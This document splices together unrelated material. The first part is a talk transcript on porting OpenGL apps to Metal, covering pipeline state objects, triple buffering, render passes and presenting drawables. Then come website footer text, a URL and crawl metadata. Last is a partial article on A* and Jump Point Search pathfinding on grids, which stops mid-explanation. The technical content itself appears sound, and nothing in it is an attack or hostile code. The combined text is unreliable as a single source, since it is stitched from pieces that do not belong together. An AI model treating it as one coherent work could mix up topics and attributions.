The vertex array object defines both the vertex attribute layout, as well as the vertex buffers. The program is a link combination of vertex and fragment shaders. And the framebuffer is a set of color and depth stencil attachments that your application intends to render to.
These state objects are created during initialization and are used throughout your frames.
Let's walk through an example to show how OpenGL manages state. Here we have a sample render loop where an OpenGL application binds a framebuffer, sets a program, and then makes other state modifications, like enabling depth, or face culling, or changing the colorMap before making a draw call. If you look at this same API trace from OpenGL's perspective, it has to track all these changes on each API call. And then when a draw call happens, it has to stop and validate to be sure that the previous changes to primitive assembly, depth state, rasterizer, and programmable stages are all compatible with each other. This validation can be super expensive.
And while OpenGL does try to minimize its negative impact, there's limited opportunity to do so. It is worth noting that the open OpenGL state objects were ahead of the curve when they were first introduced. Framebuffer objects combine attached render targets, programs linked fragment and vertex shaders together, and vertex array objects were larger objects combining some of the vertex attribute API's and vertex buffer setup. But even with all these changes, although they yielded positive results, OpenGL still has to validate many things on a draw call, such as will the -- can the ColorMask help optimize the fragment shader? Is the fragment shader output compatible with the attached frame buffer? Is the vertex layout compatible with the bound program? Or are the attached render targets blendable? So as we redesigned the graphic state management for Metal, we took the program shaders combined with the vertex input layouts from the VertexArray objects and added the information about attachment pixelFormat and blend state, and we combined them into one object called the PipelineDescriptor. This structure describes all the relevant states in the graphics pipeline. To set up the descriptor, first you initialize it.
And then you set all the state we just talked about, like vertex and fragment shaders, vertex information, pixel formats, and blend state. And then you take that descriptor and you create what is called a pipeline state object or PSO.
This immutable object fully describes the render state. And what's great about it is that you create it once, have it validated for correctness, and then use it throughout your program. In a similar way, we combined all the depth and stencil-related settings into a depth/stencil state descriptor. And, again, it is a collection of all the depth/stencil state. And you take this descriptor and you create what's called a depth/stensil state object. This object is also immutable and used throughout your program. So the render loop we were looking at in OpenGL now looks like this in Metal. With all of the prevalidated state objects, there's no longer any state validation or tracking. Let's look through the comparison. In Metal, the render encoder is the start of a render pass, similar to binding your frame buffer. Now that your depth state is prebaked into an object, you simply set it on the renderEncoder.
The PipelineState object represents and combination of program shaders, VertexArray properties, and a pixelFormat. And it's also set on the renderEncoder.
And now the renderEncoder manages your rasterizer state directly.
And it's important to note here that there is still flexibility in your pipeline, as not everything is prebaked into your PipelineState object. Here's the list of state that we've just been discussing that you prebake into your PSO: State like vertex and fragment functions and pixel formats, etc. On the other hand, here's all the state that you still set while drawing -- state like primitive culling mode and direction, fill mode. Scissor and viewport areas are still set just like in OpenGL.
And ultimately, the draw calls remain the same. The main difference here is that instead of enabling new state, which could incur hidden validation costs, you simply swap out a new PipelineState object that had blending enabled in its descriptor.
I want to discuss one more possible optimization that you may have used in OpenGL in order to hide certain expensive operations. As an OpenGL developer, you may have seen that your render loop has an unexpected hiccup on the first draw call after making a bunch of state changes. And if this is the case, you probably use an optimization to hide that called shader pre-warming. In shader pre-warming, an application uses dummy draw calls for the most common GL programs in order to have OpenGL create all the state that's necessary ahead of time. If you were doing this in your engine already, then it's going to be very easy for you to replace it with PSO creation.
Now shader pre-warming in Metal is accomplished through creating separate PSO objects with different state enabled. First, you create your descriptor, and then you set all of the state up until the first draw call and create your first PipelineState object.
Then you can take that same descriptor, change a bit of state on it -- like here we're enabling blending -- and you create a second PipelineState object.
Both of these are prevalidated so that during draw time you can just swap them out between draw calls. Hopefully if you're porting from OpenGL to Metal, this is a straightforward change. Now, as we conclude the setup stage of our application, I'd like to bring up one of the main benefits of porting your app from OpenGL to Metal, and it is that it will start doing expensive operations less often. In OpenGL, your application would have to wait until draw time in order to do things like compile and link shaders or validate states, which means that these expensive operations happen many times per frame.
Once you port your app to Metal, your application moves these operations to different stages of its lifetime. With precompiled shaders, shader compilation has moved out of initialization and into build time so it's only done once. Then with PSO's, state definition is moved to content loading. So that leaves your draw time free to actually make draw calls. So now that we've completed the setup stage of your application, let's talk about using all these resources, shaders, and objects to render frames. In order to draw a single frame, your application needs to first update textures and buffers, then establish a render target to render to, and then make several render passes before finally presenting your work. Let's talk about updating resources. Typically, at least some resources have to be updated continuously throughout your render loop. Such examples are shader constants, vertex and index buffers, and textures. And these modifications can be accomplished between frames through synchronization between the GPU and the CPU.
A typical GL resource update can be any combination of the following calls: A buffer can be updated by the CPU; or you can update a buffer through the GPU via buffer-to-buffer copy.
Similarly, a texture can be updated by the CPU or it can be updated via texture-to-texture copy on the GPU. At a glance, Metal offers similar functionality.
But as Lionel mentioned earlier, the containers for buffers and textures are immutable and are created during initialization; however, their contents can be modified through any combination of the following. A buffer with shared or managed storage mode can be updated through its contents property on the CPU. And on the GPU, the blitEncoder is in charge of doing all data copying. And so you can update a buffer from the GPU via the copyFromBuffer methods on the blitEncoder.
Similarly, a texture with shared or managed storage mode can be updated on the CPU through its replaceRegion method. Or on the GPU, you can update a texture through the copyFromTexture methods on the blitEncoder. Note that storage mode matters here when it comes to these updates as only buffers and textures with shared or managed storage modes can be updated by the CPU. OpenGL managed the synchronization between the GPU and CPU for you, though sometimes at exorbitant costs to your application as it waited for one or the other to be done. In Metal, because you control how the memory is stored, you also control how and when the data is synchronized.
And this is true for both buffers and textures. If you port your GL app to Metal and only use a single buffer for your resource updates, the flow will look like this.
First, your CPU will update your resources during the setup of a render pass.
And then once complete, the buffer will be available for the GPU to consume during the execution of that render pass. However, while the GPU is reading from this buffer, the CPU may begin setting up for the following render pass and will need to update the same buffer, which is a clear race condition. So let's look at one approach to solve this problem.
A simple solution would be to commit this resource to the GPU with the waitUntilCompleted call on the commandBuffer it is used in. As we discussed earlier, this is similar to glFinish and it places a semaphore on all CPU work until the GPU is done executing the render pass that uses that buffer. After the execution is completed, a call back is received from the GPU, and this way you can ensure that your single buffer will not be stomped on by the CPU or the GPU.
However, as you can see, the CPU is idle while the GPU is executing, and the GPU is starved waiting for the CPU to commit work. So while this can be helpful for you at the beginning while you're working out these race conditions, it is not recommended to use waitUntilCompleted as it introduces latency into your program. Instead, an efficient way to synchronize your updates is to use two or more buffers depending on your application's needs so that the CPU can write to one while the GPU reads from another. Let's look at a simple triple buffering example. So here we start with the first resource ready to go for the -- to be consumed by the GPU. But instead of waitUntilCompleted, we just add a completion handler so that once the corresponding frame is finished on the GPU, it can let the CPU know that it is done. But now we don't have to wait for it to be done.
While the GPU is executing, with triple buffering the CPU can jump two updates ahead because it's in different buffers. So here we are with the -- with the frame done executing on the GPU, and this is where the completion handler comes in. It notifies that GPU work is done and then returns the buffer to the buffer pool so that it can be used by the CPU in the next frame while the GPU continues execution. I think most developers will find that they'll need to implement triple buffering to achieve optimal performance.
As for implementation, for triple buffering, of course, you need to start with a queue of three buffers. You also need to initialize your frameBoundarySemaphore with a starting value of three. And this semaphore will be signaled at each frame boundary when the GPU is done executing, letting the CPU know that it is safe to override that buffer.
And finally, we need to initialize the buffer index to point at the current frame's buffer. Inside the render loop, before we write to a buffer, we need to ensure that the GPU is completely done executing the corresponding frame.
So at the beginning of each render pass, we need to wait on our frameBoundarySemaphore.
And then once the signal has been received, we know that it's safe to grab its buffer and reuse it for new frame data. And now we encode commands and bind this resource to the GPU to be used in the next frame. But before we commit it, we have to add our completion handler to the commandBuffer and then we commit it. And once the GPU has finished executing, our completion handler will signal our frame semaphore, allowing the CPU to know that it is done and it can reuse the buffer for the next frame's encoding.
And this is a simple triple buffer implementation that you can adopt for any dynamic resource updates. Okay. So now we have our resources updated, so let's talk about render targets. In OpenGL, framebuffer objects are the destination for rendering commands. An FBO collects a number of textures and render buffer objects under one umbrella and facilitates rendering into them.
The state of a framebuffer is mutable, and the render pass is loosely outlined by binding a framebuffer and ultimately swapping them for display. This is a typical OpenGL workflow with framebuffers. During the application's initialization stage, a framebuffer is created. And then you make it current by binding it.
And then you attach resources like textures and then check the framebuffer status to make sure it's valid to use. During draw time, you make a framebuffer current by binding it, which is implicit start to a render pass. And then you have to clear it before you make any draw calls to it. And then at the end you can signal that certain attachments can be discarded to let OpenGL know that it's not necessary to store these contents into memory. These discard events can serve as hints to end the render pass, but it's not a guarantee. In Metal, the render command encoder is the destination for rendering commands. A render command encoder is created from a render pass descriptor, which, similar to an FBO, collects a number of rendering destinations for a render pass and facilitates rendering into them.
A render command encoder is directly responsible for generating the hardware commands for your GPU, and a render pass is explicitly delineated by the starting and ending of encoders.
Here's a render pass in Metal. You start by creating your renderPassDescriptor.
And the renderPassDescriptor describes all the attached resources and also specifies the operations that happen at the beginning and end of a render pass -- these are called load and store actions. In contrast to GL, in Metal you do not clear a resource directly; instead, you specify a load action to clear it and also the color.
Here, it is black. The store action here is don't care, which is similar to GL discard framebuffer in our GL example. If you want to store the results to memory, you would use the store action here instead. And at render time, you use your descriptor to create your encoder so the state is set. You make all your draw calls and then explicitly end encoding. But before discarding framebuffers or ending encoding, let's actually draw something. A series of render commands is often referred to as a render pass. Inside the render pass, you set up state and draw call inputs like textures and buffers and then issue your draw commands. This is a typical OpenGL draw sequence. A well-behaved OpenGL app tries to set all of its state ahead of time, and then it binds its target and a GL program to link shaders.
Then it will bind resources such as vertex buffers, uniforms, and textures to different stages in the program. And finally, it will draw. As we've discussed a few moments ago, OpenGL state changes can cause hidden validation checks. And if you're already grouping your state changes together in OpenGL to avoid these performance hits, then you'll get the most out of Metal's pre-validated state objects. In Metal, because validation only happens when you create your PipelineState object and because shaders are precompiled, your render loop becomes much smaller. But for a programmer, there's not that many changes to do. Here is the same code that we looked at in OpenGL but now in Metal. You start with your render command encoder, which is an equivalent to setting the GL framebuffer. And then you set your prebuilt PipelineState object, which is equivalent to GL use program. And after that, we assign resources for our Metal program, starting with the VertexBuffer and uniforms.
And you can note here that you have to set your uniforms per shader stage instead of like in GL you set it for the GL program. And here, because we ported it directly from OpenGL, we're sending the same set of uniforms; but in Metal you can send different ones if you want. And then you set your textures and issue the draw call.
And finally, once you've done all the draw calls, you can end your render pass.
And now, once the work is submitted, there's still the matter of presenting.
As the GPU renders the scene, it writes out to a framebuffer to display.
In OpenGL, in order to present a rendered frame, when you return from drawInRect, the context calls the presetRenderBuffer for you. Metal, on the other hand, accomplishes this directly through Core Animations pool of drawables.
And drawables are textures for on-screen display. And you can encode a render pass to encode to drawables. You fetch the current drawable, and then after your render loop tell the command buffer to present it. Remember our code from the very, very beginning of this talk when we were talking about the windows subsystem.
Here we're going to dive into glkView and drawInMTKView to see how you can present what you've rendered. So here it is. In glkView you bind your framebuffer; perform your render commands; and then when you return from drawInRect, the present is managed for you. In Metal it's much the same: You create your commandBuffer, perform your render commands by creating ending encoders, and then the one extra step you have to take is to call presentDrawable yourself before finally committing your commandBuffer. And if your render loop is very simple with a single encoder, then this is all you have to do; however, if you do have a more complex app, you may want to check out the talk we have on delivering optimized Metal apps and games for how to handle your drawables. And that concludes our frame. So we've shown how the window subsystem can be migrated easily. We've gone over the resource creation steps. We've ported our shaders and used the great tools to quickly find issues. We created our render command queue, command buffers, and command encoders to set up our render passes. And we created our prevalidated state objects. Then to render each frame, we used triple buffering to update our resources. We used the render command encoders for our command -- for our render passes where we drew our geometry before ultimately presenting the rendered frame.
We've walked through the life of a graphics app and showed how Metal is a natural evolution.
Many of OpenGL's established concepts have migrated into Metal to work alongside new concepts that we've added to address specific problems raised in the graphics community.
If you can take one thing away from this session, we hope it's that porting your applications from OpenGL to Metal is not intimidating and that your application will actually benefit from it. But if you have room for two things, it's that Metal also offers an awesome set of tools to enhance your developing experience.
Max already demoed Xcode's built-in frame capture and shader debugger to offer deeper insight into subtle issues within your code. But Xcode also offers the new GPU memory viewer to understand and optimize how to use memory in your application.
In instruments we have a game performance template that includes the Metal system trace to visualize submission issues which might cause frame drops. And new this year we also have support for Metal in the simulator. Yay, you can get excited.
[laughs] New with Xcode 11 on macOS Catalina, we have full hardware acceleration to run your games and apps for iOS and tvOS simulator using Metal.
The simulator supports the MTLGPUFamilyApple2 feature set and should meet the majority of your needs to run all of your apps and games in all available screen resolutions.
For a deeper dive into the simulator and how it achieves hardware acceleration, please check out the simulator talk tomorrow morning. If you're looking to solve a specific issue with Metal, you can see our many, many sessions online.
For more information, you can check out our documentation on our website or you can visit us in the Metal lab tomorrow morning. And with that, thank you all for coming, and I hope to see you at the bash.
Looking for something specific? Enter a topic above and jump straight to the good stuff.
An error occurred when submitting your query. Please check your Internet connection and try again.
|
https://developer.apple.com/videos/play/wwdc2019/611/
|
CC-MAIN-2019-51
|
refinedweb
| 8,356
| 71.24
|
Search is one of the most important and powerful functionality in web applications these days. It helps users to easily find content, products etc on your website. Without search option, users will have to find their way out to reach the desired content which no one likes to do. Just imagine Amazon without search bar, you will have to navigate through various categories to find out the product, and it may take you forever to find Search
Elastic search is a highly scalable lucene based search engine. It provides distributed, multitenant-capable full text search with support of schemaless JSON documents. ElasticSearch is able to achieve fast search responses because, instead of searching the text directly, it searches an index instead. It also provides RESTful API and almost any action can be performed using a simple RESTful API using JSON over HTTP. More details on elastic search can be found on its official page .
Haystack
Haystack is a django app which provides modular search and supports various backends like elastic search, whoosh, solr, etc. It provides a unified API so that underlying backend can be changed if required without needing to modify the code.
Setting up haystack and elastic search
Installing haystack
Haystack can be installed via pip. After installation, just add it to your installed apps.
pip install django-haystack INSTALLED_APPS = [ .... 'haystack', ... ]
Installing Elastic search
Download the elastic search from their official website . After downloading the file, unzip it and navigate to bin directory. You can run the elastic search executable to start the elastic search server with default config. Just hit 127.0.0.1:9200 in your browser to check whether your elastic search server is up or not.
You can also specify your own config file while starting elastic search server using the following command
elasticsearch --config=<PATH_TO YOUR_CONFIG_FILE>/elasticsearch.yml
You will also need to install elastic search python binding to get it working with haystack
pip install elasticsearch
Modifying django configuration to specify haystack backend
Once this is done, you need to modify django settings file and specify the search backend.
HAYSTACK_CONNECTIONS = { 'default': { 'ENGINE': 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine', 'URL': '', 'INDEX_NAME': 'haystack', }, }
That’s it, your django website is now running with haystack and elastic search. Now that you have setup haystack and elastic search, lets see how to use them in the next section.
Working with Search Indexes
First you need to create an index (SearchIndex) so that haystack knows what to search on. SearchIndex objects are the way Haystack determines what data should be placed in the search index. SearchIndex are field-based and manipulate/ store data similar to Django Models.
Lets assume we have a blog model with the following model attributes.
from django.db import models from django.contrib.auth.models import User class Blog(models.Model): user = models.ForeignKey(User) pub_date = models.DateTimeField() title = models.CharField(max_length=200) body = models.TextField() def __unicode__(self): return self.title
Creating Search Indexes
Now we want to build search functionality for this blog model with the capability to search in blog’s title, body and with author name. The first step is to create the SearchIndex as outlined below
import datetime from haystack import indexes from myapp.models import Blog class BlogIndex(indexes.SearchIndex, indexes.Indexable): text = indexes.CharField(document=True, use_template=True) author = indexes.CharField(model_attr='user') pub_date = indexes.DateTimeField(model_attr='pub_date') def get_model(self): return Blog def index_queryset(self, using=None): """Used when the entire index for model is updated.""" return self.get_model().objects.filter(pub_date__lte=datetime.datetime.now())
Understanding Search Index
Every SearchIndex requires there be one (and only one) field with document=True . This indicates the primary search field to both Haystack and the search engine. Additionally, we’re providing use_template=True on the text field. This allows us to use a data template (rather than error-prone concatenation) to build the document for search engine to index. Template is a simple text file and everything you want to be available for search should go in this file. Just create a new file named blog_text.txt inside your template directory with the following content
# templates/search/indexes/myapp/blog_text.txt
{{ object.title }} {{ object.user.get_full_name }} {{ object.body }}
Here we have included blog title, author name and blog body to be included for search.
Note that we have added author and pub_date fields as well in the BlogIndex. These are useful if you want to do additional filtering on your search results.
We have also specified custom index_queryset to only allow indexing of blogs whose published date is less than equals present date. This is done to prevent indexing of blogs which are not yet published. You can put any condition in this method and control what all things you want to be indexed.
That’s it, now run the following command to build the index
./manage.py rebuild_index
This will build the index, there are other commands also like clear_index, update_index etc which you will require later, full reference is given on the official haystack documentation page .
Querying Data
Now that your search is setup and index is built, its time to query data you need. Haystack has a very good API for querying data and is lot similar to django ORM in terms of usage and functions provided.
Haystack provides SearchQuerySet class to make performing a search and iterating over its results easy and consistent. Lets search for content “haystack with elastic search” using the index built previously.
from haystack.query import SearchQuerySet results = SearchQuerySet().filter(content='haystack with elastic search')
The results can be iterated upon as well for individual items like shown below
for item in results: author = item.author ....
Often if you have multiple searchIndex classes, its better to specify which models to search in to speed up the search like shown below
from haystack.query import SearchQuerySet results = SearchQuerySet().models(Blog).filter(content='haystack with elastic search')
You can also filter with other fields in the searchIndex class, use order_by, values, values_list and other options. Have a look at the official documentation for more details on SearchQuerySet API.
That’s it for this tutorial, I will talk about using autocomplete , spelling suggestions , custom backend and other functionalities of haystack and elastic search in the second part of this tutorial.
I hope you find this article helpful. Let me know if you have any suggestions/ feedback in the comments section below.
Fun Fact: Game of Thrones season 6 is back, and its episode 4 is also titled as the book of stranger
|
http://126kr.com/article/90ta5mh6quy
|
CC-MAIN-2017-17
|
refinedweb
| 1,087
| 56.86
|
Red Hat Bugzilla – Full Text Bug Listing
SPEC:
SRPM:
Description:
JGraph is the a lightweight and feature-rich graph component
for Java. It provides automatic 2D layout and routing for diagrams.
Object and relations can be displayed in any Swing UI via provided
zoomable compontent. It is accompanied by diagram editor, JGraphpad..
jgraph.spec:135: W: libdir-macro-in-noarch-package (main package) %attr(-,root,root) %{_libdir}/gcj/%{name}
Rpmlint is incorrect, rpmlint is failing to detect the %if conditional around the noarch. So no problems here
So rpmlint output is OK.
===
Items to be addressed:
===
> >
>This is pretty much irrelevant to this package review.
I believe it may be relevant, as otherwise your -debuginfo package is broken. There are workarounds shown in both that bug (bug 472292) and in bug 191014. Please fix this..
It is not always clear why a given version will fail (sometimes deps are missing, sometimes compiler crashes, documentation build failure, or whatever may be the case.
Providing scratch builds provides assurance that this is not the case. I prefer not to review packages which may fail to work under any given F- distribution that is not near EOL.
Note the following SHOULD from the package review checklist:
"SHOULD: The package should compile and build into binary rpms on all supported architectures."
>I prefer not using dos2unix for endline conversion
>This is a matter of taste and I'd prefer to follow packager's one, thus no
>change here.
Fair enough.
> > Fully standards-compliant (What standard? ISO 9001? Why do I (user) care?)
> Interoperability?
Apologies for the following rant, feel free to skip it as the current description is good :)
-- BEGIN RANT --
ISO9000 and friends have nothing to do with interoperability (). They are workplace quality systems ISOs, and really have nothing to do with software (or anything really.) They were popular a few years ago amongst marketing and manager types. It is entirely possible that upstream is simply being facetious here, as actual accreditation is a long and complex (and quite boring) procedure, which individual developers would be unlikely to undertake.
-- END RANT --
===
Oh sorry, one more comment.
Please re-instate the changelog entry by Mary, which looks to have been inadvertently deleted
+- Added gcj stuff
This should be inserted after line 160.
(In reply to comment #1)
>.
Might be. I replaced this with Documentation, just to be on safe side.
> >This is pretty much irrelevant to this package review.
>
> I believe it may be relevant, as otherwise your -debuginfo package is broken.
> There are workarounds shown in both that bug (bug 472292) and in bug 191014.
> Please fix this.
Ah, sorry, you're right. I thought this was common to all Java packages, not this package's fault. Addressed in new version.
>.
I do not need this anywhere < Fedora 13. Common practice is that if anyone else needs this, he maintains it there. Therefore, if you need the package in F-12, F-11 or even F-10, feel free to maintain it there yourself (once it's in), but the maintenance burden is on your shoulders :) That means -- it's waste of bandwidth and builders cpu cycles from my point of view, since I don't care :)
> > > Fully standards-compliant (What standard? ISO 9001? Why do I (user) care?)
>
> > Interoperability?
>
> Apologies for the following rant, feel free to skip it as the current
> description is good :)
I won't pretend I knew what ISO 9001 is :)
New package:
SPEC:
SRPM:
scratch build:
*** Bug 252084 has been marked as a duplicate of this bug. ***
*** Bug 472793 has been marked as a duplicate of this bug. ***
Hello,
I started reviewing this, and noticed that upstream have just undergone some changes, which I think we need to track. In particular a project called "jgraphx" (aka jgraph-6 apparently) has been released by the author.
For now, please update to jgraph-5.13. comments).
Unfortunately I am still getting those debuginfo errors with your latest SRPM.
Oh and note that the author has relicenced under BSD for 5.13.
(In reply to comment #6)
> For now, please update to jgraph-5.13.
Good catch, thank you.
Done.
>
You're completely right. Given how big is the tendency of Java programmers to often completely redesign APIs and namespace hierarchies it's not uncommon (in fact it is very common) to keep older versions of packages as long as they are being depended on and package new ones with another name (see junit - junit4, saxon - saxon8 (jpackage), etc. not even bothering to follow the -compat package naming). I currently have no need to package jgraphx, but as you correctly noted that would really be handled separately.
> Unfortunately I am still getting those debuginfo errors with your latest SRPM.
Did -debuginfo generate correctly for you? For me and the scratch build as well, it did. Please don't get confused with messages about complaints about problems finding files with dollar sign characters ("$") in their file names -- they're really not to be found, it's just the result of how does find-debuginfo determine the .java files paths from .class-es embedded in jars.
(In reply to comment #7)
> Oh and note that the author has relicenced under BSD for 5.13.
Changed.
New package:
SPEC:
SRPM:
scratch build:
Key:
[+] - OK
[N] - Not applicable
[!] - Attention required
[+] MUST: rpmlint must be run on every package. The output should be posted in the review.
==
$ cat tmp
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-5.13.0.0-1.fc10.i386.rpm
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-javadoc-5.13.0.0-1.fc10.i386.rpm
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-debuginfo-5.13.0.0-1.fc10.i386.rpm
$ rpmlint `cat tmp | awk '{print $2}'`
3 packages and 0 specfiles checked; 0 errors, 0 warnings.
$ rpmlint jgraph.spec
jgraph.spec:139: W: libdir-macro-in-noarch-package (main package) %attr(-,root,root) %{_libdir}/gcj/%{name}
0 packages and 1 specfiles checked; 0 errors, 1 warnings.
$ sudo rpm -i ../RPMS/i386/jgraph-5.13.0.0-1.fc10.i386.rpm
$ sudo rpm -i ../RPMS/i386/jgraph-javadoc-5.13.0.0-1.fc10.i386.rpm
$ rpmlint jgraph jgraph-javadoc
2 packages and 0 specfiles checked; 0 errors, 0 warnings.
==
rpmlint is wrong here, as discussed earlier. So OK
[+]:
$ md5sum jgraph-5.13.0.0-bsd-src.jar
16b0e3af6c5ac3e776d9c95e9a1f54fe jgraph-5.13.0.0-bsd-src.jar
SRPM:
16b0e3af6c5ac3e776d9c95e9a1f54fe jgraph-latest-bsd-src.jar
OK
[+] MUST: The package MUST successfully compile and build into binary rpms on at least one primary architecture.
.
Am I being a bit dense, or is there a "Requires: java" missing?
[N] MUST: The spec file MUST handle locales properly. This is done by using the %find_lang macro. Using %{_datadir}/locale/* is strictly forbidden.
[N] MUST: Every binary RPM package (or subpackage) which stores shared library files (not just symlinks) in any of the dynamic linker's default paths, must call ldconfig in %post and %postun.
[+] MUST: Packages must NOT bundle copies of system libraries.
] MUST: Header files must be in a -devel package.
[N] MUST: Static libraries must be in a -static package.
[N] MUST: Packages containing pkgconfig(.pc) files must 'Requires: pkgconfig' (for directory ownership and usability).
[N] MUST: If a package contains library files with a suffix (e.g. libfoo.so.1.1), then library files that end in .so (without suffix) must go in a -devel package.
[N] MUST: In the vast majority of cases, devel packages must require the base package using a fully versioned dependency: Requires: %{name} = %{version}-%{release}
[N] MUST: Packages must NOT contain any .la libtool archives, these must be removed in the spec if they are built.
).
[+] MUST: All filenames in rpm packages must be valid UTF-8.
[N] SHOULD: If the source package does not include license text(s) as a separate file from upstream, the packager SHOULD query upstream to include it.
[N] SHOULD: The description and summary sections in the package spec file should contain translations for supported Non-English languages, if available.
[+] SHOULD: The reviewer should test that the package builds in mock.
Koji:
F11:
F12:
[+] SHOULD: The package should compile and build into binary rpms on all supported architectures.
We have koji builds for F11, F12.
[!].
[N] SHOULD: If scriptlets are used, those scriptlets must be sane. This is vague, and left up to the reviewers judgement to determine sanity.
[+] SHOULD: Usually, subpackages other than devel should require the base package using a fully versioned dependency.
] SHOULD: If the package has file dependencies outside of /etc, /bin, /sbin, /usr/bin, or /usr/sbin consider requiring the package which provides the file instead of the file itself.
If you fix these issues, then I will approve the package.
>If you fix these issues, then I will approve the package.
Just to clarify, I am not a sponsor. I will be happy with the review, however.
Thanks for your time and review.
(In reply to comment #9)
> [!] MUST: All build dependencies must be listed in BuildRequires, except for
> any that are listed in the exceptions section of the Packaging Guidelines ;
> inclusion of those as BuildRequires is optional. Apply common sense.
> Am I being a bit dense, or is there a "Requires: java" missing?
You're right. In fact, I the package should depend on jpackage-utils since it owns /usr/share/java this package used. Added a dependency on jpackage-utils, it also depends on java so it's not necessary to list it twice.
> [!].
I'm quite reluctant to do this since it's extra work for virtually no benefit (and just a SHOULD, not MUST). It's not a common practice either. If you insist on verifying functionality you insist on doing so I suggest you try to build something that depends on it (say, microba, see bug #532205). It would be rather uncommon for a Java library not to function once it compiles though.
(In reply to comment #10)
> >If you fix these issues, then I will approve the package.
> Just to clarify, I am not a sponsor. I will be happy with the review, however.
I am already sponsored (in fact, I'm a sponsor), so I don't need a sponsor to review packages. Anyone who's in the packager group (e.g. you) can review my packages (this ticket would block FE_NEEDSPONSOR if I needed a sponsor).
New package:
SPEC:
SRPM:
I've managed to get the examples to work in jgraph, with your current SRPM, so this package is APPROVED.
Thank you! (I'm also creating F-11 and F-12 branches as you requested and will orphan them as soon as they are created. Feel free to take them in pkgdb then).
By the way, you seem to have forgotten to set the review flag to '+'. Please do so when you approve the package.
New Package CVS Request
=======================
Package Name: jgraph
Short Description: Java-based Diagram Component and Editor
Owners: lkundrak
Branches: F-11 F-12 EL-5
Sorry, but this ticket isn't assigned to anyone, is still in NEW state, and the fedora-review flag is unset. It doesn't look like it's quite time for CVS.
CVS done.
Imported and built.
Thank you for Review and CVS.
(orphaning in F-11 and F-12, feel free to pick it up)
|
https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=532203
|
CC-MAIN-2016-26
|
refinedweb
| 1,888
| 66.33
|
;
src/index.jsis the JavaScript entry point.
You can delete or rename the other files.
You may create subdirectories inside
src. For faster rebuilds, only files inside
src are processed by Webpack.
You need to put any JS and CSS files inside
src, or Webpack won’t see them..
Displaying Lint Output in the Editor
Note: this feature is available with
react-scripts@0.2.0.
A note for Atom
linter-eslintusers
If you are using the Atom
linter-eslintplugin, make sure that Use global ESLint installation option is checked:>; }
There is currently no support for preprocessors such as Less, or for sharing variables across CSS files.
Adding Images and Fonts
With Webpack, using static assets like images and fonts works similarly to CSS.
You can
import an image right in a JavaScript module. This tells Webpack to include that image in the bundle. Unlike CSS imports, importing an image or a font gives you a string value. This value is the final image path you can reference in your code. function Header;). However it may not be portable to some other environments, such as Node.js and Browserify. If you prefer to reference static assets in a more traditional way outside the module system, please let us know in this issue, and we will consider support for react-bootstrap -._. These environment variables will be defined for you on
process.env. For example, having an environment variable named
REACT_APP_SECRET_CODE will be exposed in your JS as
process.env.REACT_APP_SECRET_CODE, in addition to
process.env.NODE_ENV.. a
text/html.. runs. You can write a smoke test with it too:
npm install --save-dev enzyme react-addons-test-utilsecyle..)
CI=true npm test
This way Jest.
Disabling jsdom
By default, the
package.json of the generated project looks like this:
// ... "scripts": { // ... "test": "react-scripts test --env=jsdom" }
If you know that none of your tests depend on jsdom, you can safely remove
--env=jsdom, and your tests will run faster...
Something Missing?
If you have ideas for more “How To” recipes that should be on this page, let us know or contribute some!
|
https://azure.microsoft.com/es-es/resources/samples/powerbi-react-client/
|
CC-MAIN-2018-30
|
refinedweb
| 352
| 66.13
|
In 2011, at the 25th National Conference on Artificial Intelligence. AAAI, Daniel Harabor and Alban Grastien presented their paper "Online Graph Pruning for Pathfinding on Grid Maps". This article explains the Jump Point Search algorithm they presented, a pathfinding algorithm that is faster than A* for uniform cost grids that occur often in games.
What to know before reading
This article assumes you know what pathfinding is. As the article builds on A* knowledge, you should also know the A* algorithm, including its details around traveled and estimated distances, and open and closed lists. The References section lists a few resources you could study.
The A* algorithm
The A* algorithm aims to find a path from a single start to a single destination node. The algorithm cleverly exploits the single destination by computing an estimate how far you still have to go. By adding the already traveled and the estimated distances together, it expands the most promising paths first. If your estimate is never smaller than the real length of the remaining path, the algorithm guarantees that the returned path is optimal.
This grid is an example of a uniform cost grid. Traveling a rectangle horizontally or vertically has a distance of 1, traveling diagonally to a neighbour has length sqrt(2). (The code uses 10/2 and 14/2 as relative approximation.) The distance between two neighbouring nodes in the same direction is the same everywhere. A* performs quite badly with uniform cost grids.
Every node has eight neighbours. All those neighbours are tested against the open and closed lists. The algorithm behaves as if each node is in a completely separate world, expanding in all directions, and storing every node in the open or closed list. In other words, every explored rectangle in the picture above has been added to the closed list.
Many of them also have been added to the open list at some point in time. While A* 'walks' towards the end node, the traveled path gets longer and the estimated path gets shorter. There are however in general a lot of feasible parallel paths, and every combination is examined and stored.
In the figure, the shortest path between the left starting point and the right destination point is any sequence of right-up diagonal or right steps, within the area of the two yellow lines, for example the green path. As a result, A* spends most of its time in handling updates to the open and closed lists, and is very slow on big open fields where all paths are equal.
Jump point search algorithm
The JPS algorithm improves on the A* algorithm by exploiting the regularity of the grid. You don't need to search every possible path, since all paths are known to have equal costs. Similarly, most nodes in the grid are not interesting enough to store in an open or closed list. As a result, the algorithm spends much less time on updating the open and closed lists. It potentially searches larger areas, but the authors claim the overall gain is still much better better due to spending less time updating the open and closed lists.
This is the same search as before with the A* algorithm. As you can see you get horizontal and vertical searched areas, which extend to the next obstacle. The light-blue points are a bit misleading though, as JPS often stacks several of them at the same location.
The algorithm
The JPS algorithm builds on the A* algorithm, which means you still have an estimate function, and open and closed lists. You also get the same optimality properties of the result under the same conditions. It differs in the data in the open and closed lists, and how a node gets expanded. The paper discussed here finds paths in 2D grids with grid cells that are either passable or non-passable. Since this is a common and easy to explain setup, this article limits itself to that as well. The authors have published other work since 2011 with extensions which may be interesting to study if your problem is different from the setup used here.
Having a regular grid means you don't need to track precise costs every step of the way. It is easy enough to compute it when needed afterwards. Also, by exploiting the regularity, there is no need to expand in every direction from every cell, and have expensive lookups and updates in the open and closed lists with every cell like A* does. It is sufficient to only scan the cells to check if there is anything 'interesting' nearby (a so-called jump point). Below, a more detailed explanation is given of the scanning process, starting with the horizontal and vertical scan. The diagonal scan is built on top of the former scans.
Horizontal and vertical scan
Horizontal (and vertical) scanning is the simplest to explain. The discussion below only covers horizontal scanning from left to right, but the other three directions are easy to derive by changing scanning direction, and/or substituting left/right for up/down.
